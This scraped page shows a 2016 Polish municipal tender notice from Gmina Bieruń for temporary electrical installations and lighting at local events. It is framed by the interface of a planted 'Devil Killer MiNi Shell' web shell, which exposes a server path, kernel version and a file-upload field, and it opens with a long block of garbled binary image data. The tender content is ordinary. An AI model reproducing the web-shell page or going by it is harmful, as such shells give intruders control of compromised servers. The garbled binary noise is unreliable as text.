JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160404/75422-N-2016.html

<p class="kh_header"><b>Bieruń: OŚWIETLENIE I OBSŁUGA IMPREZ  W GMINIE BIERUŃ W ROKU 2016</b><br>
<b>Numer ogłoszenia: 75422 - 2016; data zamieszczenia: 04.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OŚWIETLENIE I OBSŁUGA IMPREZ  W GMINIE BIERUŃ W ROKU 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Przedmiotem zamówienia jest wykonanie tymczasowych instalacji elektrycznych zasilania urządzeń, odbiorników, oświetlenia (w tym dekoracyjnego) na potrzeby imprez lokalnych organizowanych na terenie Gminy Bieruń w 2016 r.
Wykaz imprez, których obsługa jest przedmiotem zamówienia, miejsca i planowane terminy ich przeprowadzenia, czas trwania, przewidywana ilość uczestników oraz podstawowe wymagania techniczne dotyczące zabezpieczenia w energię elektryczną podano w tabeli 1.
 


Tabela 1 - wykaz planowanych imprez organizowanych na terenie Bierunia w 2016 r.
Lp.	Nazwa imprezy	Miejsce imprezy	Planowany termin	Przewidywany czas trwania	Wymagania  techniczne
1.	Przegląd artystycznych zespołów emeryckich	Amfiteatr w Bieruniu Nowym ul.Remizowa	21.05.2016	10.00 - 22.00	Zabezpieczenie energetyczne z budynku amfiteatru
2.	Festyn rodzinny w Ścierniach	Tereny zielone przy przedszkolu przy ul.Kamiennej	28.05.2016	16.00 - 22.30	- zabezpieczenie energetyczne 30 kW
- oświetlenie terenu
3.	Dzień Dziecka	Rynek w Bieruniu	05.06.2016	14.00 - 20.00	- zabezpieczenie energetyczne 30 kW
4.	Noc Świętojańska nad Wisłą	Tereny zielone  w międzywale rzeki Wisły 	25.06.2016	17.00 - 23.00	Zabezpieczenie energetyczne:
- scena 40 kW + agregat prądotwórczy 160 kW
- gastronomia i handel 40 kW  + agregat prądotwórczy z OSP Bieruń Nowy
5.	Festyn rodzinny przy ul. Granitowej	Tereny zielone przy placu zabaw	06.08.2016	16.00 - 22.00	- zabezpieczenie energetyczne 30 kW
- oświetlenie dekoracyjne (girlandy)
6.	Festyn rodzinny na Barańcu	Boisko przy ul. Kopańskiej	13.08.2016	16.00 - 23.00	- zabezpieczenie energetyczne 30 kW
- oświetlenie terenu
7.	Dni Bierunia 2016	Rynek w Bieruniu	03.09.2016 / 04.09.2016	03.09.2016
17.00 - 21.00
04.09.2016
15.00 - 22.30	Zabezpieczenie energetyczne:
- scena 40 kW + agregat prądotwórczy 160 kW
- gastronomia i handel 40 kW
8.	Dożynki 2016	Amfiteatr w Bieruniu Nowym ul.Remizowa	11.09.2016	14.00 - 22.30	Zabezpieczenie energetyczne z budynku amfiteatru + agregat prądotwórczy z OSP Bieruń Nowy
9.	Jarmark Bożonarodzeniowy	Rynek w Bieruniu	10.12.2016 /
11.12.2016	10.12.2016
10.00 - 18.00
11.12.2016
10.00 - 18.00	Zabezpieczenie energetyczne 40 kW
10. 	Sylwester	Rynek w Bieruniu	31.12.2016 / 01.01.2017	31.12.2016
22.30 - 00.00
01.01.2017
00.00 - 01.30	Zabezpieczenie energetyczne 30 kW


2. Dla każdej wyszczególnionej  w  tabeli 1  imprezy lokalnej  Wykonawca jest  zobowiązany:
a) wykonać z materiałów własnych tymczasowe instalacje elektryczne zasilania urządzeń, odbiorników oraz oświetlenia w tym oświetlenia dekoracyjnego, składające się w zależności od potrzeb z rozdzielnicy ) rozdzielnic przenośnych 230/400V, kabli )przewodów elektrycznych, złączy kablowych, konstrukcji wsporczych przewodów, rur osłonowych kabli oraz innego niezbędnego do wykonania instalacji osprzętu elektrycznego;

b) przed podaniem napięcia na  instalację elektryczną zapewnić wykonanie przez osoby 
posiadające ważne zaświadczenia kwalifikacyjne w zakresie pomiarów urządzeń i instalacji elektroenergetycznych do 1kV wymagane przepisami  pomiary elektryczne i sprawdzenia instalacji, a w szczególności: 
- pomiary rezystancji izolacji kabli / przewodów, 
        - sprawdzenie doboru i nastaw zabezpieczeń nadprądowych,
- sprawdzenie ochrony przeciwporażeniowej instalacji w tym wyłączników przeciwporażeniowych,
- oględziny stanu technicznego rozdzielnic i sposobu prowadzenia kabli / przewodów  ze  szczególnym uwzględnieniem dostępności do nich przez osoby niepowołane;
c) spełnić wszelkie wymagania techniczne i formalne Operatora Sieci Dystrybucyjnej na terenie Gminy Bieruń: firmę TAURON Dystrybucja S.A.  warunkujące zgodę na podanie pod napięcie instalacji elektrycznej;
d) podać pod napięcie tymczasowe  instalacje elektryczne oraz zapewnić bezawaryjną dostawę energii na potrzeby imprezy przez cały czas jej trwania, a po jej zakończeniu niezwłocznie zdemontować instalację;
e) zapewnić wykonanie wszelkich prac montażowych, instalacyjnych, pomiarowych   
        i eksploatacyjnych instalacji elektrycznych przez osoby posiadające ważne 
uprawnienia  kwalifikacyjne SEP w zakresie eksploatacji, dozoru i pomiarów urządzeń
        i instalacji elektrycznych i elektroenergetycznych do napięcia 1kV;
f) do zatrudniania wyłącznie osób posiadających właściwe kwalifikacje oraz które odbyły 
   wymagane odrębnymi przepisami szkolenia wstępne i okresowe BHP;
g) wszystkie prace transportowe, montażowe, pomiarowe, eksploatacyjne prowadzić zgodnie z obowiązującymi przepisami BHP a w szczególności zgodnie z rozporządzeniem w sprawie BHP przy urządzeniach i instalacjach energetycznych;
h) do zapewnienia przez cały czas trwania imprezy nadzoru nad właściwą eksploatacją urządzeń i instalacji elektrycznej w szczególności pod kątem niezawodności zasilania oraz ochrony przeciwporażeniowej;
i) zapewnić we własnym zakresie transport materiałów własnych.
3. Dla imprezy lokalnej wyszczególnionej w pkt. 4 (Noc Świętojańska na Wisłą) oraz wyszczególnionej w pkt. 7 (Dni Bierunia 2016) Wykonawca zapewni każdorazowo we własnym zakresie agregat prądotwórczy o mocy nie mniejszej niż 160 kW zasilający scenę. Przewidywany czas pracy agregatu prądotwórczego będzie wynosił:
a) dla imprezy Noc Świętojańska nad Wisłą- założyć pracę agregatu w ilości do ok.  12h przy obciążeniu 80% mocy maksymalnej. 
b) dla imprezy Dni Bierunia 2016 - założyć pracę agregatu w ilości do ok. 12 h przy obciążeniu 80% mocy  maksymalnej. 
        Paliwo do agregatu prądotwórczego, jego transport oraz obsługę zapewnia Wykonawca.
4. Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący  załącznik do SIWZ.
5. Zamawiający zastrzega sobie prawo przesunięcia terminu imprezy i zmiany czasu jej trwania, a także jej  odwołania w skutek warunków atmosferycznych, uwarunkowań organizacyjnych losowych  i innych. 
6. Powyższe usługi objęte są stawką VAT w wysokości 23%.            
7.Zamawiający nie przewiduje: zamówień uzupełniających, dynamicznego systemu zakupów, aukcji elektronicznej, zamówień uzupełniających, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy pzp. 
8.  Zamawiający nie dokonuje zastrzeżenia, o którym mowa w art. 36a ust.2 pkt 1 ustawy pzp.
9. Zamawiający wyklucza Wykonawców z przyczyn podanych w art.24 ustawy pzp
10. Zamawiający nie dopuszcza składania ofert częściowych wariantowych.
11. Kody Wspólnego Słownika Zamówień CPV:
     50232110-4   Obsługa instalacji oświetlenia publicznego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  1 000 zł (słownie:  tysiąc złotych) zasady wnoszenia  i zwrotu , formy, termin wniesienia określa SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego  
      przez Wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez Wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez Wykonawcę:
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.	Lista wymaganych oświadczeń.
Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że spełnia warunki dotyczące:
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu Wykonawcy.
Jeżeli Wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii.

B)1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dostarcza oświadczenia i dokumenty wymienione w pkt. A Lista wymaganych oświadczeń oraz  w pkt. B Lista wymaganych dokumentów. Zamiast dokumentu, o których mowa w punkcie 1  Listy wymaganych dokumentów, przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości  (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
      Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa wyżej.
2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
- kto jest podmiotem przyjmującym zasoby;
- zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, którymi Wykonawca będzie dysponował przy realizacji zamówienia);
- czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy realizacji zamówienia (w realizacji której części zamówienia będzie brał udział podmiot trzeci
i w jakiej formie np. podwykonawstwo);
- jakiego okresu dotyczy zobowiązanie.
W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu 
w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą za
szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
5.	Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.
6.	Podmioty występujące wspólnie
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
(np. konsorcjum/spółki cywilnej) do oferty należy dołączyć:
a)	Pełnomocnictwo określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego zakresu działania i uprawnień do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Pełnomocnictwo winno zawierać, w szczególności:
- nazwy wszystkich Wykonawców wspólnie ubiegający się o realizację zamówienia 
i udzielających pełnomocnictwa,
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania Wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy,
- czas trwania (zawiązania umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- cel zawarcia (wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii.
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem.
b)	Oświadczenia wymienione w SIWZ punkcie V.A SIWZ powinny być złożone w taki sposób, 
aby warunki, o których mowa w punkcie IV SIWZ, Wykonawcy występujący wspólnie spełnili łącznie.
c)	Dokumenty wymienione w SIWZ pkt. V B  Listy wymaganych dokumentów, składa każdy z Wykonawców wchodzących w skład podmiotu występującego wspólnie.
d)	Zgodnie z art. 141 ustawy pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.

C)Oferta musi zawierać:
1)	Wypełniony formularz ofertowy oraz formularz kalkulacyjny.
2)	Dokumenty i oświadczenia dla potwierdzenia spełnienia wymaganych warunków oraz braku podstaw do wykluczenia z postępowania.
3)	Pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii, w przypadku reprezentacji Wykonawcy przez pełnomocnika oraz w przypadku uczestnictwa w postępowaniu podmiotów występujących wspólnie.
Do oferty należy załączyć informacje w zakresie części zamówienia, które zostaną powierzone Podwykonawcom lub podania przez Wykonawcę nazw (firm) Podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w zakresie:
a) Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  zgodnie z obowiązującą stawką.
b)  Zmiany podwykonawcy lub powierzenia podwykonawcy części zakresu zamówienia w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty.
    Jeżeli zmiana lub rezygnacja podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art.26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1  ww. ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.


c)  Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie  obowiązujących przepisów prawa.
d)  Innych  zmian,  których  nie  można  było  przewidzieć  na  etapie  sporządzania SIWZ, a które nie wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu 43-150 Bieruń ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2016 godzina 11:00, miejsce: Urząd Miejski w Bieruniu 43-150 Bieruń ul. Rynek 14 ( Kancelaria- parter).</p>
